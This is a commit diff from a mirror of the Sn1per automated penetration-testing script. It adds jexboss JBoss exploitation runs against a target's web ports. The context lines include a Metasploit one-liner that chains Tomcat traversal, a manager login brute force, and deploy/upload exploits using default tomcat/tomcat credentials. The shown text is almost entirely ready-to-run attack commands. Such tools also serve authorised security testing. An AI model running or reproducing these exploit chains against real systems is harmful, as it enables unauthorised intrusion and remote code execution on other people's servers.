mirror of https://github.com/1N3/Sn1per.git
Update sniper
This commit is contained in:
parent
141ad2d5d8
commit
3415c7fd81
6
sniper
6
sniper
|
|
@ -996,6 +996,8 @@ else
|
|||
cd ..
|
||||
nikto -h http://$TARGET:8000
|
||||
cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
|
||||
python jexboss/jexboss.py -host http://$TARGET:8000
|
||||
|
||||
fi
|
||||
|
||||
if [ -z "$port_8100" ];
|
||||
|
|
@ -1014,6 +1016,7 @@ else
|
|||
cd ..
|
||||
nikto -h http://$TARGET:8100
|
||||
cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
|
||||
python jexboss/jexboss.py -host http://$TARGET:8100
|
||||
fi
|
||||
|
||||
if [ -z "$port_8080" ];
|
||||
|
|
@ -1062,6 +1065,7 @@ else
|
|||
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
|
||||
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
|
||||
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
||||
python jexboss/jexboss.py -host http://$TARGET:8180
|
||||
fi
|
||||
|
||||
if [ -z "$port_8443" ];
|
||||
|
|
@ -1082,6 +1086,7 @@ else
|
|||
nikto -h https://$TARGET:8443
|
||||
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
|
||||
nmap -p 8443 -T5 --script=*proxy* $TARGET
|
||||
python jexboss/jexboss.py -host https://$TARGET:8443
|
||||
fi
|
||||
|
||||
if [ -z "$port_8888" ];
|
||||
|
|
@ -1096,6 +1101,7 @@ else
|
|||
xsstracer $TARGET 8888
|
||||
nikto -h http://$TARGET:8888
|
||||
cutycapt --url=https://$TARGET:8888 --out=loot/$TARGET-port8888.jpg
|
||||
python jexboss/jexboss.py -host http://$TARGET:8888
|
||||
fi
|
||||
|
||||
if [ -z "$port_10000" ];
|
||||
|
|
|
|||
Loading…
Reference in New Issue